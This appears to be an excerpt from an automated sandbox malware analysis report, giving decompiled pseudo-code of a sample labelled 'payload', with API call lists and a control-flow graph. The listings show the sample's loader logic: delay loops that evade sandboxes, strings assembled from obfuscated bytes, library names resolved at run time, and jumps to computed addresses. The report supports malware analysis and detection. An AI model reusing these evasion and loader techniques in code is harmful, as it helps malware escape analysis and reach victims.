    						_t23 = E00402E18(_t22); // executed
    						_push("true");
    						 *_t54 =  *_t54 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t24 = E00402BB3(_t23); // executed
    						if(_t24 != 0) {
    							goto L15;
    						}
    						_push(0x1e);
    						do {
    							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t54 =  *_t54 - 1;
    						} while ( *_t54 != 0);
    						_t54 = _t54 + 4;
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t26); // executed
    						_pop(_t46);
    						 *_t54 =  *_t54 +  *((intOrPtr*)(_t46 + 0x3c));
    						_t50 = _t46;
    						 *0x405002 = _t50 + 0xa4;
    						_t28 =  *0x405002;
    						_t29 =  *_t28;
    						 *0x405002 = _t29;
    						_t63 =  *0x405002 - 0xfff;
    						if(_t63 > 0) {
    							goto L15;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t63 < 0) {
    							goto L15;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t34);
    						 *0x40501a =  *0x40501a + _t34;
    						if( *((intOrPtr*)(_t52 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							_t35 =  *0x40501a; // 0x0
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push( *0x4050cf);
    				_t36 = E00402AD0(_t35);
    				_push( *0x4050cf);
    				_t37 = E00402AD0(_t36);
    				_push(1);
    				 *_t54 =  *_t54 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t37) != 0) {
    					goto L1;
    				}
    				_push("zzdjjqpqaxlgt");
    				_t38 = E00402E18(_t13);
    				_push("zzdjjqpqaxlgt");
    				E00402E18(_t38);
    				_push(E004024DE);
    				return E004024DE;
    			}

    Instruction addresses for the listing above (the address column, spilled one per line by extraction): prologue 0x00402183-0x004021a3; the L1 path executes in the block shared with the other functions at 0x00401e1e-0x00401fd9, with L15/L16 at 0x00402749-0x0040274c, returning through 0x00401e34; the fall-through path at 0x004021a9-0x004021f6.

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 50%
    			E004015CA() {
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				intOrPtr _t15;
    				struct HINSTANCE__* _t19;
    				intOrPtr _t20;
    				struct HINSTANCE__* _t23;
    				void* _t24;
    				intOrPtr _t25;
    				long _t27;
    				intOrPtr* _t29;
    				intOrPtr _t30;
    				void* _t35;
    				void* _t38;
    				intOrPtr* _t40;
    				void* _t44;
    				void* _t48;
    				void* _t50;
    				intOrPtr* _t52;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push("zzdjjqpqaxlgt");
    				_t13 = E00402E18(_t12);
    				_push(0xf);
    				 *_t52 =  *_t52 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t13) != 0) {
    					L3:
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t15 = E00401CAE(_t14); // executed
    					__eflags = _t15;
    					if(_t15 != 0) {
    						L15:
    						L16:
    						goto L16;
    					}
    					__eflags = _t50 - 0xfd00;
    					if(_t50 < 0xfd00) {
    						goto L15;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t19 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t19;
    					_t40 = "pejpCreate";
    					 *_t40 = 0x70616548;
    					 *((short*)(_t40 + 4)) = 0x7243;
    					 *((short*)(_t40 + 6)) = 0x6165;
    					_push(_t40);
    					_push(_t19);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t19);
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t20 = E00401CAE(_t19); // executed
    					__eflags = _t20;
    					if(_t20 != 0) {
    						goto L15;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t50 - 4)) = _t23;
    					_push(_t23);
    					__eflags = _t23;
    					if(_t23 == 0) {
    						goto L15;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t24 = E00402E18(_t23); // executed
    					_push("true");
    					 *_t52 =  *_t52 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t25 = E00402BB3(_t24); // executed
    					__eflags = _t25;
    					if(_t25 != 0) {
    						goto L15;
    					}
    					_push(0x1e);
    					do {
    						_t27 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t52 =  *_t52 - 1;
    						__eflags =  *_t52;
    					} while ( *_t52 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t27); // executed
    					_pop(_t44);
    					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t52 + 4)) +  *((intOrPtr*)(_t44 + 0x3c));
    					_t48 = _t44;
    					 *0x405002 = _t48 + 0xa4;
    					_t29 =  *0x405002;
    					_t30 =  *_t29;
    					 *0x405002 = _t30;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L15;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L15;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t35);
    					 *0x40501a =  *0x40501a + _t35;
    					__eflags =  *((intOrPtr*)(_t50 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push( *0x4050cf);
    				_t38 = E00402AD0(_t14);
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t38) != 0) {
    					goto L3;
    				}
    				_push(E00402749);
    				return E00402749;
    			}

    Instruction addresses for the listing above (the address column, spilled one per line by extraction): prologue 0x004015ca-0x004015f4; the L3 path executes in the block shared with the other functions at 0x00401e1e-0x00401fd9, with L15/L16 at 0x00402749-0x0040274c; the fall-through path at 0x004015fa-0x00401629.

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 48%
    			E004023F0() {
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t16;
    				struct HINSTANCE__* _t20;
    				void* _t21;
    				struct HINSTANCE__* _t24;
    				void* _t25;
    				void* _t26;
    				long _t28;
    				intOrPtr* _t30;
    				intOrPtr _t31;
    				void* _t36;
    				signed int _t37;
    				intOrPtr* _t40;
    				void* _t44;
    				void* _t48;
    				void* _t50;
    				intOrPtr* _t52;
    				void* _t61;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push("zzdjjqpqaxlgt");
    				_t13 = E00402E18(_t12);
    				_push( *0x4050cf);
    				_t14 = E00402AD0(_t13);
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t14) != 0) {
    					L1:
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t16 = E00401CAE(_t15); // executed
    					if(_t16 != 0 || _t50 < 0xfd00) {
    						L15:
    						L16:
    						goto L16;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t20 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t20;
    						_t40 = "pejpCreate";
    						 *_t40 = 0x70616548;
    						 *((short*)(_t40 + 4)) = 0x7243;
    						 *((short*)(_t40 + 6)) = 0x6165;
    						_push(_t40);
    						_push(_t20);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t20);
    						_push(1);
    						 *_t52 =  *_t52 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t21 = E00401CAE(_t20); // executed
    						if(_t21 != 0) {
    							goto L15;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t24 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t50 - 4)) = _t24;
    						_push(_t24);
    						if(_t24 == 0) {
    							goto L15;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t25 = E00402E18(_t24); // executed
    						_push("true");
    						 *_t52 =  *_t52 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t26 = E00402BB3(_t25); // executed
    						if(_t26 != 0) {
    							goto L15;
    						}
    						_push(0x1e);
    						do {
    							_t28 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t52 =  *_t52 - 1;
    						} while ( *_t52 != 0);
    						_t52 = _t52 + 4;
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t28); // executed
    						_pop(_t44);
    						 *_t52 =  *_t52 +  *((intOrPtr*)(_t44 + 0x3c));
    						_t48 = _t44;
    						 *0x405002 = _t48 + 0xa4;
    						_t30 =  *0x405002;
    						_t31 =  *_t30;
    						 *0x405002 = _t31;
    						_t61 =  *0x405002 - 0xfff;
    						if(_t61 > 0) {
    							goto L15;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t61 < 0) {
    							goto L15;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t36);
    						 *0x40501a =  *0x40501a + _t36;
    						if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							_t37 =  *0x40501a; // 0x0
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t37) != 0) {
    					goto L1;
    				}
    				_push(E00402749);
    				return E00402749;
    			}

    Instruction addresses for the listing above (the address column, spilled one per line by extraction): prologue 0x004023f0-0x00402426; the L1 path executes in the block shared with the other functions at 0x00401e1e-0x00401fd9, with L15/L16 at 0x00402749-0x0040274c, returning through 0x00401e34; the fall-through path at 0x0040242c-0x0040244f.

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 48%
    			E0040238F() {
    				void* _t11;
    				void* _t12;
    				void* _t14;
    				struct HINSTANCE__* _t18;
    				void* _t19;
    				struct HINSTANCE__* _t22;
    				void* _t23;
    				void* _t24;
    				long _t26;
    				intOrPtr* _t28;
    				intOrPtr _t29;
    				void* _t34;
    				signed int _t35;
    				void* _t36;
    				void* _t37;
    				intOrPtr* _t40;
    				void* _t44;
    				void* _t48;
    				void* _t50;
    				intOrPtr* _t52;
    				void* _t61;
    
    				_push("zzdjjqpqaxlgt");
    				_t12 = E00402E18(_t11);
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t12) != 0) {
    					L1:
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t14 = E00401CAE(_t13); // executed
    					if(_t14 != 0 || _t50 < 0xfd00) {
    						L15:
    						L16:
    						goto L16;
    					} else {
    						 *0x305061 = 0x6b;
    						 *0x00305062 = 0x65;
    						 *0x00305063 = 0x72;
    						 *0x00305064 = 0x6e;
    						 *0x00305065 = 0x65;
    						 *0x00305066 = 0x6c;
    						 *0x00305067 = 0x33;
    						_t18 = LoadLibraryA("kernel32.dll");
    						 *0x40500e = _t18;
    						_t40 = "pejpCreate";
    						 *_t40 = 0x70616548;
    						 *((short*)(_t40 + 4)) = 0x7243;
    						 *((short*)(_t40 + 6)) = 0x6165;
    						_push(_t40);
    						_push(_t18);
    						_push(__imp__LoadLibraryExW);
    						_pop( *0x40500a);
    						_push(_t18);
    						_push(1);
    						 *_t52 =  *_t52 - 1;
    						_push("vwzhywkzcohliu");
    						_push("oledcrpjmksdjf"); // executed
    						_t19 = E00401CAE(_t18); // executed
    						if(_t19 != 0) {
    							goto L15;
    						}
    						L"oidsapi.dll" = 0x6e;
    						M00405038 = 0x74;
    						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
    						 *((intOrPtr*)(_t50 - 4)) = _t22;
    						_push(_t22);
    						if(_t22 == 0) {
    							goto L15;
    						}
    						_push("zzdjjqpqaxlgt"); // executed
    						_t23 = E00402E18(_t22); // executed
    						_push("true");
    						 *_t52 =  *_t52 - 1;
    						_push(0x4050b3);
    						_push("bkktdsxxkjueaz"); // executed
    						_t24 = E00402BB3(_t23); // executed
    						if(_t24 != 0) {
    							goto L15;
    						}
    						_push(0x1e);
    						do {
    							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
    							 *_t52 =  *_t52 - 1;
    						} while ( *_t52 != 0);
    						_t52 = _t52 + 4;
    						 *0x40501a = 0;
    						_push("zzdjjqpqaxlgt"); // executed
    						E00402E18(_t26); // executed
    						_pop(_t44);
    						 *_t52 =  *_t52 +  *((intOrPtr*)(_t44 + 0x3c));
    						_t48 = _t44;
    						 *0x405002 = _t48 + 0xa4;
    						_t28 =  *0x405002;
    						_t29 =  *_t28;
    						 *0x405002 = _t29;
    						_t61 =  *0x405002 - 0xfff;
    						if(_t61 > 0) {
    							goto L15;
    						}
    						asm("sbb dword [ecx], 0xa0");
    						if(_t61 < 0) {
    							goto L15;
    						}
    						 *0x405016 = GetProcAddress();
    						LoadLibraryA("kernel32.dll");
    						 *0x40501a = E004019C6;
    						_push(E00402749);
    						_pop(_t34);
    						 *0x40501a =  *0x40501a + _t34;
    						if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
    							 *0x40501a =  *0x40501a - E00402749;
    							_t35 =  *0x40501a; // 0x0
    							goto __eax;
    						}
    						 *0x40501a =  *0x40501a ^ E004019C6;
    						goto __eax;
    					}
    				}
    				_push("zzdjjqpqaxlgt");
    				_t36 = E00402E18(_t35);
    				_push( *0x4050cf);
    				_t37 = E00402AD0(_t36);
    				_push(0xf);
    				 *_t52 =  *_t52 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t37) != 0) {
    					goto L1;
    				}
    				_push(E00401BF1);
    				return E00401BF1;
    			}

    Instruction addresses for the listing above (the address column, spilled one per line by extraction): prologue 0x0040238f-0x004023b0; the L1 path executes in the block shared with the other functions at 0x00401e1e-0x00401fd9, with L15/L16 at 0x00402749-0x0040274c, returning through 0x00401e34; the fall-through path at 0x004023b6-0x004023ee.

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 50%
    			E00401B90() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				void* _t37;
    				intOrPtr* _t40;
    				void* _t44;
    				void* _t48;
    				void* _t50;
    				intOrPtr* _t52;
    
    				_push(0xf);
    				 *_t52 =  *_t52 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					L3:
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L15:
    						L16:
    						goto L16;
    					}
    					__eflags = _t50 - 0xfd00;
    					if(_t50 < 0xfd00) {
    						goto L15;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t40 = "pejpCreate";
    					 *_t40 = 0x70616548;
    					 *((short*)(_t40 + 4)) = 0x7243;
    					 *((short*)(_t40 + 6)) = 0x6165;
    					_push(_t40);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t52 =  *_t52 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L15;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t50 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L15;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t52 =  *_t52 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L15;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t52 =  *_t52 - 1;
    						__eflags =  *_t52;
    					} while ( *_t52 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t44);
    					 *((intOrPtr*)(_t52 + 4)) =  *((intOrPtr*)(_t52 + 4)) +  *((intOrPtr*)(_t44 + 0x3c));
    					_t48 = _t44;
    					 *0x405002 = _t48 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L15;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L15;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t50 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t50 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push("zzdjjqpqaxlgt");
    				_t36 = E00402E18(_t12);
    				_push(1);
    				 *_t52 =  *_t52 - 1;
    				_push("vwzhywkzcohliu");
    				_push("oledcrpjmksdjf");
    				if(E00401CAE(_t36) != 0) {
    					goto L3;
    				}
    				_push("zzdjjqpqaxlgt");
    				_t37 = E00402E18(_t12);
    				_push( *0x4050cf);
    				E00402AD0(_t37);
    				_push(E00402183);
    				return E00402183;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    C-Code - Quality: 51%
    			E0040162B() {
    				void* _t11;
    				intOrPtr _t13;
    				struct HINSTANCE__* _t17;
    				intOrPtr _t18;
    				struct HINSTANCE__* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				long _t25;
    				intOrPtr* _t27;
    				intOrPtr _t28;
    				void* _t33;
    				void* _t36;
    				void* _t37;
    				void* _t38;
    				intOrPtr* _t41;
    				void* _t45;
    				void* _t49;
    				void* _t51;
    				intOrPtr* _t53;
    
    				_push(0xf);
    				 *_t53 =  *_t53 - 1;
    				_push(0x4050b3);
    				_push("bkktdsxxkjueaz");
    				if(E00402BB3(_t11) != 0) {
    					_push(1);
    					 *_t53 =  *_t53 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t13 = E00401CAE(_t12); // executed
    					__eflags = _t13;
    					if(_t13 != 0) {
    						L14:
    						L15:
    						goto L15;
    					}
    					__eflags = _t51 - 0xfd00;
    					if(_t51 < 0xfd00) {
    						goto L14;
    					}
    					 *0x305061 = 0x6b;
    					 *0x00305062 = 0x65;
    					 *0x00305063 = 0x72;
    					 *0x00305064 = 0x6e;
    					 *0x00305065 = 0x65;
    					 *0x00305066 = 0x6c;
    					 *0x00305067 = 0x33;
    					_t17 = LoadLibraryA("kernel32.dll");
    					 *0x40500e = _t17;
    					_t41 = "pejpCreate";
    					 *_t41 = 0x70616548;
    					 *((short*)(_t41 + 4)) = 0x7243;
    					 *((short*)(_t41 + 6)) = 0x6165;
    					_push(_t41);
    					_push(_t17);
    					_push(__imp__LoadLibraryExW);
    					_pop( *0x40500a);
    					_push(_t17);
    					_push(1);
    					 *_t53 =  *_t53 - 1;
    					_push("vwzhywkzcohliu");
    					_push("oledcrpjmksdjf"); // executed
    					_t18 = E00401CAE(_t17); // executed
    					__eflags = _t18;
    					if(_t18 != 0) {
    						goto L14;
    					}
    					L"oidsapi.dll" = 0x6e;
    					M00405038 = 0x74;
    					_t21 = LoadLibraryExW( &((L"")[1]), 0, 0);
    					 *((intOrPtr*)(_t51 - 4)) = _t21;
    					_push(_t21);
    					__eflags = _t21;
    					if(_t21 == 0) {
    						goto L14;
    					}
    					_push("zzdjjqpqaxlgt"); // executed
    					_t22 = E00402E18(_t21); // executed
    					_push("true");
    					 *_t53 =  *_t53 - 1;
    					_push(0x4050b3);
    					_push("bkktdsxxkjueaz"); // executed
    					_t23 = E00402BB3(_t22); // executed
    					__eflags = _t23;
    					if(_t23 != 0) {
    						goto L14;
    					}
    					_push(0x1e);
    					do {
    						_t25 = WaitForSingleObject(0xffffffff, 1); // executed
    						 *_t53 =  *_t53 - 1;
    						__eflags =  *_t53;
    					} while ( *_t53 != 0);
    					 *0x40501a = 0;
    					_push("zzdjjqpqaxlgt"); // executed
    					E00402E18(_t25); // executed
    					_pop(_t45);
    					 *((intOrPtr*)(_t53 + 4)) =  *((intOrPtr*)(_t53 + 4)) +  *((intOrPtr*)(_t45 + 0x3c));
    					_t49 = _t45;
    					 *0x405002 = _t49 + 0xa4;
    					_t27 =  *0x405002;
    					_t28 =  *_t27;
    					 *0x405002 = _t28;
    					__eflags =  *0x405002 - 0xfff;
    					if(__eflags > 0) {
    						goto L14;
    					}
    					asm("sbb dword [ecx], 0xa0");
    					if(__eflags < 0) {
    						goto L14;
    					}
    					 *0x405016 = GetProcAddress();
    					LoadLibraryA("kernel32.dll");
    					 *0x40501a = E004019C6;
    					_push(E00402749);
    					_pop(_t33);
    					 *0x40501a =  *0x40501a + _t33;
    					__eflags =  *((intOrPtr*)(_t51 - 4)) - 0xffffffff;
    					if( *((intOrPtr*)(_t51 - 4)) != 0xffffffff) {
    						 *0x40501a =  *0x40501a - E00402749;
    						goto __eax;
    					}
    					 *0x40501a =  *0x40501a ^ E004019C6;
    					goto __eax;
    				}
    				_push("zzdjjqpqaxlgt");
    				_t36 = E00402E18(_t12);
    				_push( *0x4050cf);
    				_t37 = E00402AD0(_t36);
    				_push( *0x4050cf);
    				_t38 = E00402AD0(_t37);
    				_push("zzdjjqpqaxlgt");
    				E00402E18(_t38);
    				_push(E004014A8);
    				return E004014A8;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 181 12a1cce-12a1cfb CreateWaitableTimerA 182 12a1d01-12a1d4e call 12a8ee8 WaitForMultipleObjects 181->182 183 12a1e56-12a1e5c GetLastError 181->183 188 12a1dad 182->188 189 12a1d50-12a1d55 call 12a1c40 182->189 184 12a1e5e-12a1e66 183->184 190 12a1daf-12a1db5 188->190 196 12a1d59-12a1d5e 189->196 192 12a1db7-12a1dbf HeapFree 190->192 193 12a1dc5-12a1dc9 190->193 192->193 193->190 195 12a1dcb-12a1dd5 CloseHandle 193->195 195->184 197 12a1d60-12a1d67 196->197 198 12a1d71-12a1d8a call 12a1b3f 196->198 197->198 199 12a1d69 197->199 201 12a1d8f-12a1d93 198->201 199->198 202 12a1dda-12a1de0 201->202 203 12a1d95-12a1da0 201->203 204 12a1e0d-12a1e15 202->204 205 12a1de2-12a1de8 202->205 203->196 206 12a1da2-12a1dab call 12a19e0 203->206 208 12a1e1b-12a1e4b _allmul WaitForMultipleObjects 204->208 205->188 207 12a1dea-12a1e0b call 12a45f0 205->207 206->188 207->208 208->196 214 12a1e51 208->214 214->188
    APIs
    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 012A1CEF
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012A1D44
      • Part of subcall function 012A1B3F: RtlAllocateHeap.NTDLL(00000000,00000800,012AA03C), ref: 012A1B54
      • Part of subcall function 012A1B3F: HeapFree.KERNEL32(00000000,?,012AB2A0), ref: 012A1BAB
      • Part of subcall function 012A19E0: lstrlenW.KERNEL32(00000000,00000000,00000000,00000800,00001000,?,?,?,?,00000001,?,012AA03C,00000000,00000000), ref: 012A1AD1
    • HeapFree.KERNEL32(00000000,?), ref: 012A1DBF
    • CloseHandle.KERNEL32(?), ref: 012A1DCF
      • Part of subcall function 012A45F0: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A45F9
      • Part of subcall function 012A45F0: Sleep.KERNEL32(0000000A,?,012A1D8F,00000002,?,?), ref: 012A4603
      • Part of subcall function 012A45F0: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4636
    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 012A1E1B
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 012A1E41
      • Part of subcall function 012A1C40: GetModuleHandleA.KERNEL32(012AC0EA,?,012ACA6A,00000014,?,012AA03C,00000000,?,?,?,012A1D55), ref: 012A1C71
